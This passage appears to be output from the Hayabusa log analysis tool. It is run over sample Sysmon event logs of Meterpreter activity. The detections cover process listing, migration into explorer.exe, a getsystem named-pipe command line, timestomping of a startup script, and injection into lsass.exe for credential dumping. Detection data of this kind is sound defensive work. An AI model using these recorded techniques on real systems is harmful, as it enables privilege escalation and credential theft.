365ABB72-F6C9-5CC7-0000-0010A25C0600,../hayabusa-rules/hayabusa/sysmon/events/10_ProcessAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Discovery/discovery_meterpreter_ps_cmd_process_listing_sysmon_10.evtx +2019-04-30 16:23:00.914 +09:00,IEWIN7,10,low,,Process Access,Src Process: D:\m.exe | Tgt Process: C:\Windows\Explorer.EXE | Src User: %SourceUser% | Tgt User: %TargetUser% | Access: 0x1410 | Src PID: 3772 | Src PGUID: 365ABB72-F7C9-5CC7-0000-0010BF010E00 | Tgt PID: 2812 | Tgt PGUID: 365ABB72-F6C9-5CC7-0000-0010135F0600,../hayabusa-rules/hayabusa/sysmon/events/10_ProcessAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Discovery/discovery_meterpreter_ps_cmd_process_listing_sysmon_10.evtx +2019-04-30 16:23:00.914 +09:00,IEWIN7,10,low,,Process Access,Src 
Process: D:\m.exe | Tgt Process: C:\Windows\System32\VBoxTray.exe | Src User: %SourceUser% | Tgt User: %TargetUser% | Access: 0x1410 | Src PID: 3772 | Src PGUID: 365ABB72-F7C9-5CC7-0000-0010BF010E00 | Tgt PID: 2908 | Tgt PGUID: 365ABB72-F6C9-5CC7-0000-00109B9A0600,../hayabusa-rules/hayabusa/sysmon/events/10_ProcessAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Discovery/discovery_meterpreter_ps_cmd_process_listing_sysmon_10.evtx +2019-04-30 16:23:00.914 +09:00,IEWIN7,10,low,,Process Access,Src Process: D:\m.exe | Tgt Process: C:\Users\IEUser\AppData\Roaming\svchost.exe | Src User: %SourceUser% | Tgt User: %TargetUser% | Access: 0x1410 | Src PID: 3772 | Src PGUID: 365ABB72-F7C9-5CC7-0000-0010BF010E00 | Tgt PID: 3016 | Tgt PGUID: 365ABB72-F6CA-5CC7-0000-00104DBB0600,../hayabusa-rules/hayabusa/sysmon/events/10_ProcessAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Discovery/discovery_meterpreter_ps_cmd_process_listing_sysmon_10.evtx +2019-04-30 16:23:00.914 +09:00,IEWIN7,10,medium,PrivEsc | Evas,Suspicious In-Memory Module Execution,,../hayabusa-rules/sigma/process_access/sysmon_in_memory_assembly_execution.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Discovery/discovery_meterpreter_ps_cmd_process_listing_sysmon_10.evtx +2019-04-30 16:23:00.914 +09:00,IEWIN7,10,medium,PrivEsc | Evas,Suspicious In-Memory Module Execution,,../hayabusa-rules/sigma/process_access/sysmon_in_memory_assembly_execution.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Discovery/discovery_meterpreter_ps_cmd_process_listing_sysmon_10.evtx +2019-04-30 16:23:00.914 +09:00,IEWIN7,10,medium,PrivEsc | Evas,Suspicious In-Memory Module Execution,,../hayabusa-rules/sigma/process_access/sysmon_in_memory_assembly_execution.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Discovery/discovery_meterpreter_ps_cmd_process_listing_sysmon_10.evtx +2019-04-30 16:23:00.914 +09:00,IEWIN7,10,medium,PrivEsc | Evas,Suspicious In-Memory Module 
Execution,,../hayabusa-rules/sigma/process_access/sysmon_in_memory_assembly_execution.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Discovery/discovery_meterpreter_ps_cmd_process_listing_sysmon_10.evtx +2019-04-30 16:23:00.914 +09:00,IEWIN7,10,medium,PrivEsc | Evas,Suspicious In-Memory Module Execution,,../hayabusa-rules/sigma/process_access/sysmon_in_memory_assembly_execution.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Discovery/discovery_meterpreter_ps_cmd_process_listing_sysmon_10.evtx +2019-04-30 16:23:00.914 +09:00,IEWIN7,10,medium,PrivEsc | Evas,Suspicious In-Memory Module Execution,,../hayabusa-rules/sigma/process_access/sysmon_in_memory_assembly_execution.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Discovery/discovery_meterpreter_ps_cmd_process_listing_sysmon_10.evtx +2019-04-30 16:23:00.914 +09:00,IEWIN7,10,medium,PrivEsc | Evas,Suspicious In-Memory Module Execution,,../hayabusa-rules/sigma/process_access/sysmon_in_memory_assembly_execution.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Discovery/discovery_meterpreter_ps_cmd_process_listing_sysmon_10.evtx +2019-04-30 16:23:00.914 +09:00,IEWIN7,10,medium,PrivEsc | Evas,Suspicious In-Memory Module Execution,,../hayabusa-rules/sigma/process_access/sysmon_in_memory_assembly_execution.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Discovery/discovery_meterpreter_ps_cmd_process_listing_sysmon_10.evtx +2019-04-30 16:23:00.914 +09:00,IEWIN7,10,medium,PrivEsc | Evas,Suspicious In-Memory Module Execution,,../hayabusa-rules/sigma/process_access/sysmon_in_memory_assembly_execution.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Discovery/discovery_meterpreter_ps_cmd_process_listing_sysmon_10.evtx +2019-04-30 16:23:00.914 +09:00,IEWIN7,10,medium,PrivEsc | Evas,Suspicious In-Memory Module Execution,,../hayabusa-rules/sigma/process_access/sysmon_in_memory_assembly_execution.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Discovery/discovery_meterpreter_ps_cmd_process_listing_sysmon_10.evtx +2019-04-30 
16:23:00.914 +09:00,IEWIN7,10,medium,PrivEsc | Evas,Suspicious In-Memory Module Execution,,../hayabusa-rules/sigma/process_access/sysmon_in_memory_assembly_execution.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Discovery/discovery_meterpreter_ps_cmd_process_listing_sysmon_10.evtx +2019-04-30 16:23:00.914 +09:00,IEWIN7,10,medium,PrivEsc | Evas,Suspicious In-Memory Module Execution,,../hayabusa-rules/sigma/process_access/sysmon_in_memory_assembly_execution.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Discovery/discovery_meterpreter_ps_cmd_process_listing_sysmon_10.evtx +2019-04-30 16:23:00.914 +09:00,IEWIN7,10,medium,PrivEsc | Evas,Suspicious In-Memory Module Execution,,../hayabusa-rules/sigma/process_access/sysmon_in_memory_assembly_execution.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Discovery/discovery_meterpreter_ps_cmd_process_listing_sysmon_10.evtx +2019-04-30 16:23:00.914 +09:00,IEWIN7,10,medium,PrivEsc | Evas,Suspicious In-Memory Module Execution,,../hayabusa-rules/sigma/process_access/sysmon_in_memory_assembly_execution.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Discovery/discovery_meterpreter_ps_cmd_process_listing_sysmon_10.evtx +2019-04-30 16:23:00.914 +09:00,IEWIN7,10,medium,PrivEsc | Evas,Suspicious In-Memory Module Execution,,../hayabusa-rules/sigma/process_access/sysmon_in_memory_assembly_execution.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Discovery/discovery_meterpreter_ps_cmd_process_listing_sysmon_10.evtx +2019-04-30 16:23:00.914 +09:00,IEWIN7,10,medium,PrivEsc | Evas,Suspicious In-Memory Module Execution,,../hayabusa-rules/sigma/process_access/sysmon_in_memory_assembly_execution.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Discovery/discovery_meterpreter_ps_cmd_process_listing_sysmon_10.evtx +2019-04-30 16:23:00.914 +09:00,IEWIN7,10,medium,PrivEsc | Evas,Suspicious In-Memory Module 
Execution,,../hayabusa-rules/sigma/process_access/sysmon_in_memory_assembly_execution.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Discovery/discovery_meterpreter_ps_cmd_process_listing_sysmon_10.evtx +2019-04-30 16:23:00.914 +09:00,IEWIN7,10,medium,PrivEsc | Evas,Suspicious In-Memory Module Execution,,../hayabusa-rules/sigma/process_access/sysmon_in_memory_assembly_execution.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Discovery/discovery_meterpreter_ps_cmd_process_listing_sysmon_10.evtx +2019-04-30 16:23:00.914 +09:00,IEWIN7,10,medium,PrivEsc | Evas,Suspicious In-Memory Module Execution,,../hayabusa-rules/sigma/process_access/sysmon_in_memory_assembly_execution.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Discovery/discovery_meterpreter_ps_cmd_process_listing_sysmon_10.evtx +2019-04-30 16:23:00.914 +09:00,IEWIN7,10,medium,PrivEsc | Evas,Suspicious In-Memory Module Execution,,../hayabusa-rules/sigma/process_access/sysmon_in_memory_assembly_execution.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Discovery/discovery_meterpreter_ps_cmd_process_listing_sysmon_10.evtx +2019-04-30 16:23:00.914 +09:00,IEWIN7,10,medium,PrivEsc | Evas,Suspicious In-Memory Module Execution,,../hayabusa-rules/sigma/process_access/sysmon_in_memory_assembly_execution.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Discovery/discovery_meterpreter_ps_cmd_process_listing_sysmon_10.evtx +2019-04-30 16:23:00.914 +09:00,IEWIN7,10,medium,PrivEsc | Evas,Suspicious In-Memory Module Execution,,../hayabusa-rules/sigma/process_access/sysmon_in_memory_assembly_execution.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Discovery/discovery_meterpreter_ps_cmd_process_listing_sysmon_10.evtx +2019-04-30 16:23:00.914 +09:00,IEWIN7,10,medium,PrivEsc | Evas,Suspicious In-Memory Module Execution,,../hayabusa-rules/sigma/process_access/sysmon_in_memory_assembly_execution.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Discovery/discovery_meterpreter_ps_cmd_process_listing_sysmon_10.evtx +2019-04-30 
16:23:00.930 +09:00,IEWIN7,10,low,,Process Access,Src Process: D:\m.exe | Tgt Process: C:\Windows\system32\cmd.exe | Src User: %SourceUser% | Tgt User: %TargetUser% | Access: 0x1410 | Src PID: 3772 | Src PGUID: 365ABB72-F7C9-5CC7-0000-0010BF010E00 | Tgt PID: 3028 | Tgt PGUID: 365ABB72-F6CA-5CC7-0000-001048C10600,../hayabusa-rules/hayabusa/sysmon/events/10_ProcessAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Discovery/discovery_meterpreter_ps_cmd_process_listing_sysmon_10.evtx +2019-04-30 16:23:00.930 +09:00,IEWIN7,10,low,,Process Access,Src Process: D:\m.exe | Tgt Process: C:\Windows\system32\conhost.exe | Src User: %SourceUser% | Tgt User: %TargetUser% | Access: 0x1410 | Src PID: 3772 | Src PGUID: 365ABB72-F7C9-5CC7-0000-0010BF010E00 | Tgt PID: 3044 | Tgt PGUID: 365ABB72-F6CA-5CC7-0000-001017C50600,../hayabusa-rules/hayabusa/sysmon/events/10_ProcessAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Discovery/discovery_meterpreter_ps_cmd_process_listing_sysmon_10.evtx +2019-04-30 16:23:00.930 +09:00,IEWIN7,10,low,,Process Access,Src Process: D:\m.exe | Tgt Process: C:\Windows\system32\SearchIndexer.exe | Src User: %SourceUser% | Tgt User: %TargetUser% | Access: 0x1410 | Src PID: 3772 | Src PGUID: 365ABB72-F7C9-5CC7-0000-0010BF010E00 | Tgt PID: 3264 | Tgt PGUID: 365ABB72-F6CF-5CC7-0000-00100C870700,../hayabusa-rules/hayabusa/sysmon/events/10_ProcessAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Discovery/discovery_meterpreter_ps_cmd_process_listing_sysmon_10.evtx +2019-04-30 16:23:00.930 +09:00,IEWIN7,10,low,,Process Access,Src Process: D:\m.exe | Tgt Process: C:\Windows\system32\cmd.exe | Src User: %SourceUser% | Tgt User: %TargetUser% | Access: 0x1410 | Src PID: 3772 | Src PGUID: 365ABB72-F7C9-5CC7-0000-0010BF010E00 | Tgt PID: 2500 | Tgt PGUID: 
365ABB72-F787-5CC7-0000-001068B30A00,../hayabusa-rules/hayabusa/sysmon/events/10_ProcessAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Discovery/discovery_meterpreter_ps_cmd_process_listing_sysmon_10.evtx +2019-04-30 16:23:00.930 +09:00,IEWIN7,10,low,,Process Access,Src Process: D:\m.exe | Tgt Process: C:\Windows\system32\conhost.exe | Src User: %SourceUser% | Tgt User: %TargetUser% | Access: 0x1410 | Src PID: 3772 | Src PGUID: 365ABB72-F7C9-5CC7-0000-0010BF010E00 | Tgt PID: 2024 | Tgt PGUID: 365ABB72-F787-5CC7-0000-0010FBB30A00,../hayabusa-rules/hayabusa/sysmon/events/10_ProcessAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Discovery/discovery_meterpreter_ps_cmd_process_listing_sysmon_10.evtx +2019-04-30 16:23:00.930 +09:00,IEWIN7,10,low,,Process Access,Src Process: D:\m.exe | Tgt Process: C:\Windows\system32\mmc.exe | Src User: %SourceUser% | Tgt User: %TargetUser% | Access: 0x1410 | Src PID: 3772 | Src PGUID: 365ABB72-F7C9-5CC7-0000-0010BF010E00 | Tgt PID: 2352 | Tgt PGUID: 365ABB72-F797-5CC7-0000-00105AF70A00,../hayabusa-rules/hayabusa/sysmon/events/10_ProcessAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Discovery/discovery_meterpreter_ps_cmd_process_listing_sysmon_10.evtx +2019-04-30 16:23:00.930 +09:00,IEWIN7,10,low,,Process Access,Src Process: D:\m.exe | Tgt Process: C:\Windows\system32\taskeng.exe | Src User: %SourceUser% | Tgt User: %TargetUser% | Access: 0x1410 | Src PID: 3772 | Src PGUID: 365ABB72-F7C9-5CC7-0000-0010BF010E00 | Tgt PID: 1236 | Tgt PGUID: 365ABB72-F7D0-5CC7-0000-0010B31E0E00,../hayabusa-rules/hayabusa/sysmon/events/10_ProcessAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Discovery/discovery_meterpreter_ps_cmd_process_listing_sysmon_10.evtx +2019-04-30 16:23:00.930 +09:00,IEWIN7,10,low,,Process Access,Src Process: D:\m.exe | Tgt Process: C:\Users\IEUser\AppData\Local\Programs\Opera\launcher.exe | Src User: %SourceUser% | Tgt User: %TargetUser% | Access: 0x1410 | Src PID: 3772 | Src PGUID: 
365ABB72-F7C9-5CC7-0000-0010BF010E00 | Tgt PID: 3712 | Tgt PGUID: 365ABB72-F7D0-5CC7-0000-0010D0220E00,../hayabusa-rules/hayabusa/sysmon/events/10_ProcessAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Discovery/discovery_meterpreter_ps_cmd_process_listing_sysmon_10.evtx +2019-04-30 16:23:00.930 +09:00,IEWIN7,10,low,,Process Access,Src Process: D:\m.exe | Tgt Process: C:\Users\IEUser\AppData\Local\Programs\Opera\60.0.3255.70\opera_autoupdate.exe | Src User: %SourceUser% | Tgt User: %TargetUser% | Access: 0x1410 | Src PID: 3772 | Src PGUID: 365ABB72-F7C9-5CC7-0000-0010BF010E00 | Tgt PID: 3624 | Tgt PGUID: 365ABB72-F7D0-5CC7-0000-0010DF2F0E00,../hayabusa-rules/hayabusa/sysmon/events/10_ProcessAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Discovery/discovery_meterpreter_ps_cmd_process_listing_sysmon_10.evtx +2019-04-30 16:23:00.930 +09:00,IEWIN7,10,low,,Process Access,Src Process: D:\m.exe | Tgt Process: C:\Users\IEUser\AppData\Local\Programs\Opera\60.0.3255.70\opera_autoupdate.exe | Src User: %SourceUser% | Tgt User: %TargetUser% | Access: 0x1410 | Src PID: 3772 | Src PGUID: 365ABB72-F7C9-5CC7-0000-0010BF010E00 | Tgt PID: 3504 | Tgt PGUID: 365ABB72-F7D1-5CC7-0000-0010AF380E00,../hayabusa-rules/hayabusa/sysmon/events/10_ProcessAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Discovery/discovery_meterpreter_ps_cmd_process_listing_sysmon_10.evtx +2019-04-30 16:23:00.930 +09:00,IEWIN7,10,low,,Process Access,Src Process: D:\m.exe | Tgt Process: C:\Windows\system32\wbem\wmiprvse.exe | Src User: %SourceUser% | Tgt User: %TargetUser% | Access: 0x1410 | Src PID: 3772 | Src PGUID: 365ABB72-F7C9-5CC7-0000-0010BF010E00 | Tgt PID: 2144 | Tgt PGUID: 365ABB72-F7D1-5CC7-0000-0010CE400E00,../hayabusa-rules/hayabusa/sysmon/events/10_ProcessAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Discovery/discovery_meterpreter_ps_cmd_process_listing_sysmon_10.evtx +2019-04-30 16:23:00.930 +09:00,IEWIN7,10,low,,Process Access,Src Process: D:\m.exe | Tgt Process: 
C:\Windows\system32\DllHost.exe | Src User: %SourceUser% | Tgt User: %TargetUser% | Access: 0x1410 | Src PID: 3772 | Src PGUID: 365ABB72-F7C9-5CC7-0000-0010BF010E00 | Tgt PID: 1344 | Tgt PGUID: 365ABB72-F7D1-5CC7-0000-001058500E00,../hayabusa-rules/hayabusa/sysmon/events/10_ProcessAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Discovery/discovery_meterpreter_ps_cmd_process_listing_sysmon_10.evtx +2019-04-30 16:23:00.930 +09:00,IEWIN7,10,medium,PrivEsc | Evas,Suspicious In-Memory Module Execution,,../hayabusa-rules/sigma/process_access/sysmon_in_memory_assembly_execution.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Discovery/discovery_meterpreter_ps_cmd_process_listing_sysmon_10.evtx +2019-04-30 16:23:00.930 +09:00,IEWIN7,10,medium,PrivEsc | Evas,Suspicious In-Memory Module Execution,,../hayabusa-rules/sigma/process_access/sysmon_in_memory_assembly_execution.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Discovery/discovery_meterpreter_ps_cmd_process_listing_sysmon_10.evtx +2019-04-30 16:23:00.930 +09:00,IEWIN7,10,medium,PrivEsc | Evas,Suspicious In-Memory Module Execution,,../hayabusa-rules/sigma/process_access/sysmon_in_memory_assembly_execution.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Discovery/discovery_meterpreter_ps_cmd_process_listing_sysmon_10.evtx +2019-04-30 16:23:00.930 +09:00,IEWIN7,10,medium,PrivEsc | Evas,Suspicious In-Memory Module Execution,,../hayabusa-rules/sigma/process_access/sysmon_in_memory_assembly_execution.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Discovery/discovery_meterpreter_ps_cmd_process_listing_sysmon_10.evtx +2019-04-30 16:23:00.930 +09:00,IEWIN7,10,medium,PrivEsc | Evas,Suspicious In-Memory Module Execution,,../hayabusa-rules/sigma/process_access/sysmon_in_memory_assembly_execution.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Discovery/discovery_meterpreter_ps_cmd_process_listing_sysmon_10.evtx +2019-04-30 16:23:00.930 +09:00,IEWIN7,10,medium,PrivEsc | Evas,Suspicious In-Memory Module 
Execution,,../hayabusa-rules/sigma/process_access/sysmon_in_memory_assembly_execution.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Discovery/discovery_meterpreter_ps_cmd_process_listing_sysmon_10.evtx +2019-04-30 16:23:00.930 +09:00,IEWIN7,10,medium,PrivEsc | Evas,Suspicious In-Memory Module Execution,,../hayabusa-rules/sigma/process_access/sysmon_in_memory_assembly_execution.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Discovery/discovery_meterpreter_ps_cmd_process_listing_sysmon_10.evtx +2019-04-30 16:23:00.930 +09:00,IEWIN7,10,medium,PrivEsc | Evas,Suspicious In-Memory Module Execution,,../hayabusa-rules/sigma/process_access/sysmon_in_memory_assembly_execution.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Discovery/discovery_meterpreter_ps_cmd_process_listing_sysmon_10.evtx +2019-04-30 16:23:00.930 +09:00,IEWIN7,10,medium,PrivEsc | Evas,Suspicious In-Memory Module Execution,,../hayabusa-rules/sigma/process_access/sysmon_in_memory_assembly_execution.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Discovery/discovery_meterpreter_ps_cmd_process_listing_sysmon_10.evtx +2019-04-30 16:23:00.930 +09:00,IEWIN7,10,medium,PrivEsc | Evas,Suspicious In-Memory Module Execution,,../hayabusa-rules/sigma/process_access/sysmon_in_memory_assembly_execution.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Discovery/discovery_meterpreter_ps_cmd_process_listing_sysmon_10.evtx +2019-04-30 16:23:00.930 +09:00,IEWIN7,10,medium,PrivEsc | Evas,Suspicious In-Memory Module Execution,,../hayabusa-rules/sigma/process_access/sysmon_in_memory_assembly_execution.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Discovery/discovery_meterpreter_ps_cmd_process_listing_sysmon_10.evtx +2019-04-30 16:23:00.930 +09:00,IEWIN7,10,medium,PrivEsc | Evas,Suspicious In-Memory Module Execution,,../hayabusa-rules/sigma/process_access/sysmon_in_memory_assembly_execution.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Discovery/discovery_meterpreter_ps_cmd_process_listing_sysmon_10.evtx +2019-04-30 
16:26:34.133 +09:00,IEWIN7,8,medium,,Process Injection,Src Process: \\vboxsrv\HTools\m.exe | Tgt Process: C:\Windows\explorer.exe | Src PID: 3772 | Src PGUID: 365ABB72-F7C9-5CC7-0000-0010BF010E00 | Tgt PID: 2812 | Tgt PGUID: 365ABB72-F6C9-5CC7-0000-0010135F0600,../hayabusa-rules/hayabusa/sysmon/alerts/8_ProcessInjection.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/meterpreter_migrate_to_explorer_sysmon_8.evtx +2019-04-30 16:46:15.215 +09:00,IEWIN7,1,info,,Process Created,Cmd: cmd.exe /c echo msdhch > \\.\pipe\msdhch | Process: C:\Windows\System32\cmd.exe | User: NT AUTHORITY\SYSTEM | Parent Cmd: C:\Windows\system32\services.exe | LID: 0x3e7 | PID: 4088 | PGUID: 365ABB72-FD47-5CC7-0000-00106AF61D00,../hayabusa-rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/sysmon_13_1_meterpreter_getsystem_NamedPipeImpersonation.evtx +2019-04-30 16:46:15.215 +09:00,IEWIN7,1,high,PrivEsc,Meterpreter or Cobalt Strike Getsystem Service Start,,../hayabusa-rules/sigma/process_creation/proc_creation_win_meterpreter_or_cobaltstrike_getsystem_service_start.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/sysmon_13_1_meterpreter_getsystem_NamedPipeImpersonation.evtx +2019-04-30 16:46:15.215 +09:00,IEWIN7,1,low,Disc,Redirect Output in CommandLine,,../hayabusa-rules/sigma/process_creation/proc_creation_win_cmd_redirect.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/sysmon_13_1_meterpreter_getsystem_NamedPipeImpersonation.evtx +2019-04-30 16:46:15.215 +09:00,IEWIN7,1,high,PrivEsc,Abused Debug Privilege by Arbitrary Parent Processes,,../hayabusa-rules/sigma/process_creation/proc_creation_win_abusing_debug_privilege.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/sysmon_13_1_meterpreter_getsystem_NamedPipeImpersonation.evtx +2019-04-30 19:12:45.583 +09:00,IEWIN7,11,info,,File Created,Path: C:\Users\IEUser\AppData\Roaming\Microsoft\Windows\Start 
Menu\Programs\Startup\bs.ps1 | Process: C:\Windows\system32\cmd.exe | PID: 3292 | PGUID: 365ABB72-1EFA-5CC8-0000-0010D3DE1C00,../hayabusa-rules/hayabusa/sysmon/events/11_FileCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/sysmon_2_11_evasion_timestomp_MACE.evtx +2019-04-30 19:13:42.052 +09:00,IEWIN7,2,low,Evas,Possible Timestomping,Path: C:\Users\IEUser\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\bs.ps1 | Process: C:\Windows\Explorer.EXE | CreationUtcTime: 2016-02-02 15:30:02.000 | PreviousCreationUtcTime: 2019-04-30 10:12:45.583 | PID: %PID% | PGUID: 365ABB72-16CD-5CC8-0000-0010483A0600,../hayabusa-rules/hayabusa/sysmon/alerts/2_PossibleTimestomping.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/sysmon_2_11_evasion_timestomp_MACE.evtx +2019-04-30 21:43:43.784 +09:00,IEWIN7,8,medium,,Process Injection,Src Process: \\VBOXSVR\HTools\voice_mail.msg.exe | Tgt Process: C:\Windows\System32\lsass.exe | Src PID: 1532 | Src PGUID: 365ABB72-4055-5CC8-0000-0010769D0B00 | Tgt PID: 492 | Tgt PGUID: 365ABB72-3FE0-5CC8-0000-00107E590000,../hayabusa-rules/hayabusa/sysmon/alerts/8_ProcessInjection.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Credential Access/CA_sysmon_hashdump_cmd_meterpreter.evtx +2019-04-30 21:43:43.784 +09:00,IEWIN7,8,medium,,Process Injection,Src Process: \\VBOXSVR\HTools\voice_mail.msg.exe | Tgt Process: C:\Windows\System32\lsass.exe | Src PID: 1532 | Src PGUID: 365ABB72-4055-5CC8-0000-0010769D0B00 | Tgt PID: 492 | Tgt PGUID: 365ABB72-3FE0-5CC8-0000-00107E590000,../hayabusa-rules/hayabusa/sysmon/alerts/8_ProcessInjection.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Credential Access/CA_sysmon_hashdump_cmd_meterpreter.evtx +2019-04-30 21:43:43.784 +09:00,IEWIN7,10,low,,Process Access,Src Process: \\VBOXSVR\HTools\voice_mail.msg.exe | Tgt Process: C:\Windows\System32\smss.exe | Src User: %SourceUser% | Tgt User: %TargetUser% | Access: 0x1f1fff | Src PID: 1532 | Src PGUID: 
365ABB72-4055-5CC8-0000-0010769D0B00 | Tgt PID: 264 | Tgt PGUID: 365ABB72-3FDE-5CC8-0000-0010142B0000,../hayabusa-rules/hayabusa/sysmon/events/10_ProcessAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Credential Access/CA_sysmon_hashdump_cmd_meterpreter.evtx +2019-04-30 21:43:43.784 +09:00,IEWIN7,10,low,,Process Access,Src Process: \\VBOXSVR\HTools\voice_mail.msg.exe | Tgt Process: C:\Windows\system32\csrss.exe | Src User: %SourceUser% | Tgt User: %TargetUser% | Access: 0x1f1fff | Src PID: 1532 | Src PGUID: 365ABB72-4055-5CC8-0000-0010769D0B00 | Tgt PID: 336 | Tgt PGUID: 365ABB72-3FDF-5CC8-0000-00103C480000,../hayabusa-rules/hayabusa/sysmon/events/10_ProcessAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Credential Access/CA_sysmon_hashdump_cmd_meterpreter.evtx +2019-04-30 21:43:43.784 +09:00,IEWIN7,10,low,,Process Access,Src Process: \\VBOXSVR\HTools\voice_mail.msg.exe | Tgt Process: C:\Windows\system32\csrss.exe | Src User: %SourceUser% | Tgt User: %TargetUser% | Access: 0x1f1fff | Src PID: 1532 | Src PGUID: 365ABB72-4055-5CC8-0000-0010769D0B00 | Tgt PID: 384 | Tgt PGUID: 365ABB72-3FE0-5CC8-0000-0010014C0000,../hayabusa-rules/hayabusa/sysmon/events/10_ProcessAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Credential Access/CA_sysmon_hashdump_cmd_meterpreter.evtx +2019-04-30 21:43:43.784 +09:00,IEWIN7,10,low,,Process Access,Src Process: \\VBOXSVR\HTools\voice_mail.msg.exe | Tgt Process: C:\Windows\system32\wininit.exe | Src User: %SourceUser% | Tgt User: %TargetUser% | Access: 0x1f1fff | Src PID: 1532 | Src PGUID: 365ABB72-4055-5CC8-0000-0010769D0B00 | Tgt PID: 392 | Tgt PGUID: 365ABB72-3FE0-5CC8-0000-00101E4C0000,../hayabusa-rules/hayabusa/sysmon/events/10_ProcessAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Credential Access/CA_sysmon_hashdump_cmd_meterpreter.evtx +2019-04-30 21:43:43.784 +09:00,IEWIN7,10,low,,Process Access,Src Process: \\VBOXSVR\HTools\voice_mail.msg.exe | Tgt Process: C:\Windows\system32\winlogon.exe | Src User: 
%SourceUser% | Tgt User: %TargetUser% | Access: 0x1f1fff | Src PID: 1532 | Src PGUID: 365ABB72-4055-5CC8-0000-0010769D0B00 | Tgt PID: 440 | Tgt PGUID: 365ABB72-3FE0-5CC8-0000-00104D520000,../hayabusa-rules/hayabusa/sysmon/events/10_ProcessAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Credential Access/CA_sysmon_hashdump_cmd_meterpreter.evtx +2019-04-30 21:43:43.784 +09:00,IEWIN7,10,low,,Process Access,Src Process: \\VBOXSVR\HTools\voice_mail.msg.exe | Tgt Process: C:\Windows\system32\services.exe | Src User: %SourceUser% | Tgt User: %TargetUser% | Access: 0x1f1fff | Src PID: 1532 | Src PGUID: 365ABB72-4055-5CC8-0000-0010769D0B00 | Tgt PID: 468 | Tgt PGUID: 365ABB72-3FE0-5CC8-0000-00100D550000,../hayabusa-rules/hayabusa/sysmon/events/10_ProcessAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Credential Access/CA_sysmon_hashdump_cmd_meterpreter.evtx +2019-04-30 21:43:43.784 